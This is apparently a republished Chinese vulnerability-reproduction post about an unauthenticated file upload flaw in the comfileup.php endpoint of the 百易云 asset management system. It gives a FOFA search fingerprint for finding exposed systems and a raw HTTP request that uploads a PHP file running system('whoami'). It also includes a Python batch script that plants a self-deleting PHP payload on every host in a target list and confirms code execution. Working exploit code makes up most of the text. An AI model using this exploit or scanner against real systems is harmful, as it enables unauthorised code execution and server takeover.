百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
FOFA:
body="不要着急,点此
无
POST /comfileup.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Content-Type: multipart/form-data; boundary=--------1110146050

----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"

<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
将响应中的 vpath 拼接到站点根路径后访问,若页面出现数字 24642(即下方脚本 payload 中 print(111*222) 的输出),说明上传的 PHP 已被执行;上面手工请求使用的是 system("whoami"),此时返回的则是目标进程的用户名。payload 中的 unlink(__FILE__) 会在执行后删除上传文件。
# encoding:utf-8
import time
import requests
import argparse
import ssl
import urllib3
import re
import json
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# The targets are appliances that typically run self-signed certificates, so
# certificate verification is switched off process-wide for ssl/urllib and the
# corresponding urllib3 warning is silenced.
# NOTE(review): this disables TLS verification for *every* HTTPS call made by
# this process - acceptable for a standalone PoC scanner, not for reusable code.
urllib3.disable_warnings(InsecureRequestWarning)
ssl._create_default_https_context = ssl._create_unverified_context
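# ANSI colour escapes for terminal output.  The escape character is ESC
# (octal \033); in the published listing the backslash had been lost, so the
# strings would have printed a literal replacement glyph followed by "33[31m".
RED = "\033[31m"
GREEN = "\033[32m"
RESET = "\033[0m"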
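def check_vuln(url: str, *, timeout: float = 20) -> bool:
    """Probe ``url`` for the unauthenticated ``comfileup.php`` upload flaw.

    A multipart POST carrying a tiny self-deleting PHP file is sent to
    ``/comfileup.php``.  If the JSON reply advertises a ``vpath`` under
    ``/uploads/``, that path is fetched and the upload is considered executed
    when the body contains ``24642`` (the output of ``print(111*222)``).

    Args:
        url: Base URL of the target, with or without a trailing slash.
        timeout: Per-request timeout in seconds (previously hard-coded to 20).

    Returns:
        True when code execution was confirmed, False otherwise (upload
        rejected, unexpected reply, network/TLS error).  The original returned
        None on the "unexpected reply" path and True even after printing the
        "not vulnerable" message; truthiness-based callers are unaffected.

    Side effects: network requests with TLS verification disabled, a coloured
    result line on stdout and - on a vulnerable host - a ``test.php`` written
    to the target's upload directory (the payload unlinks itself once run).
    Only use against systems you are authorised to test.
    """
    # rstrip, not strip: strip("/") would also eat leading slashes and the
    # scheme separator is never at the start anyway.
    base = url.rstrip("/")
    target = base + "/comfileup.php"
    boundary = "--------1110146050"
    user_agent = (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
    )
    upload_headers = {
        "User-Agent": user_agent,
        "Content-Type": f"multipart/form-data; boundary={boundary}",
    }
    fetch_headers = {"User-Agent": user_agent}
    # Multipart body with explicit CRLF separators.  The published listing had
    # lost the backslashes ("rn" instead of "\r\n"), which produces a body the
    # server cannot parse.  The PHP prints 111*222 and then deletes itself.
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="file";filename="test.php"\r\n'
        "\r\n"
        "<?php\nprint(111*222);unlink(__FILE__);?>\r\n"
        f"--{boundary}--"
    )
    try:
        upload = requests.post(
            target, headers=upload_headers, data=body.encode("ascii"),
            verify=False, timeout=timeout,
        )
        if not (
            upload.status_code == 200
            and "fname" in upload.text
            and '"vpath":"/uploads/' in upload.text
        ):
            # Endpoint absent or reply not in the expected shape: stay quiet,
            # as the original did, so batch output only lists decided hosts.
            return False
        vpath = json.loads(upload.text)["vpath"]
        # json.loads already unescapes "\/"; the replace only covers a raw
        # escaped slash that might slip through in a non-standard reply.
        result_url = base + vpath.replace("\\/", "/")
        result = requests.get(
            result_url, headers=fetch_headers, verify=False, timeout=timeout,
        )
    except (RequestException, ValueError, KeyError, AttributeError) as exc:
        # Unreachable host, TLS failure, non-JSON reply or missing/odd "vpath".
        # Reported instead of silently swallowed so a batch run shows timeouts.
        print(f"[!] {url} 请求失败: {exc}")
        return False

    if result.status_code == 200 and "24642" in result.text:
        print(f"{RED}[+] {url} 存在任意文件上传漏洞,上传地址为:{result_url}{RESET}")
        return True
    print(f"{GREEN}[-] {url} 不存在任意文件上传漏洞{RESET}")
    return False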
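def _normalize_url(raw: str) -> str:
    """Prefix a bare host (or host:port) with ``http://``; leave full URLs alone."""
    raw = raw.strip()
    if raw.startswith(("http://", "https://")):
        return raw
    return "http://" + raw


def main() -> None:
    """Parse ``-u URL`` / ``-f FILE`` and run ``check_vuln`` on each target.

    At least one of the two options is required; the original accepted neither
    and then silently did nothing.  When both are given ``-u`` wins, as before.
    Blank lines in the list file are skipped.
    """
    parser = argparse.ArgumentParser(description="文件上传漏洞检测脚本")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", help="目标URL列表文件")
    args = parser.parse_args()

    if not args.url and not args.file:
        parser.error("one of -u/--url or -f/--file is required")

    if args.url:
        check_vuln(_normalize_url(args.url))
        return

    with open(args.file, "r", encoding="utf-8") as fh:
        targets = [line for line in fh.read().splitlines() if line.strip()]
    for target in targets:
        check_vuln(_normalize_url(target))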
if __name__ == "__main__":
    # Script entry point.  main() returns None, so SystemExit(None) exits
    # with status 0 - identical to falling off the end of the module.
    raise SystemExit(main())
python .\BaiYiYun-comfileup-Fileupload.py -f .\1.txt
python .\BaiYiYun-comfileup-Fileupload.py -u 192.168.1.1
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】百易云资产管理运营系统 comfileup.php 任意文件上传漏洞 (附批量验证脚本)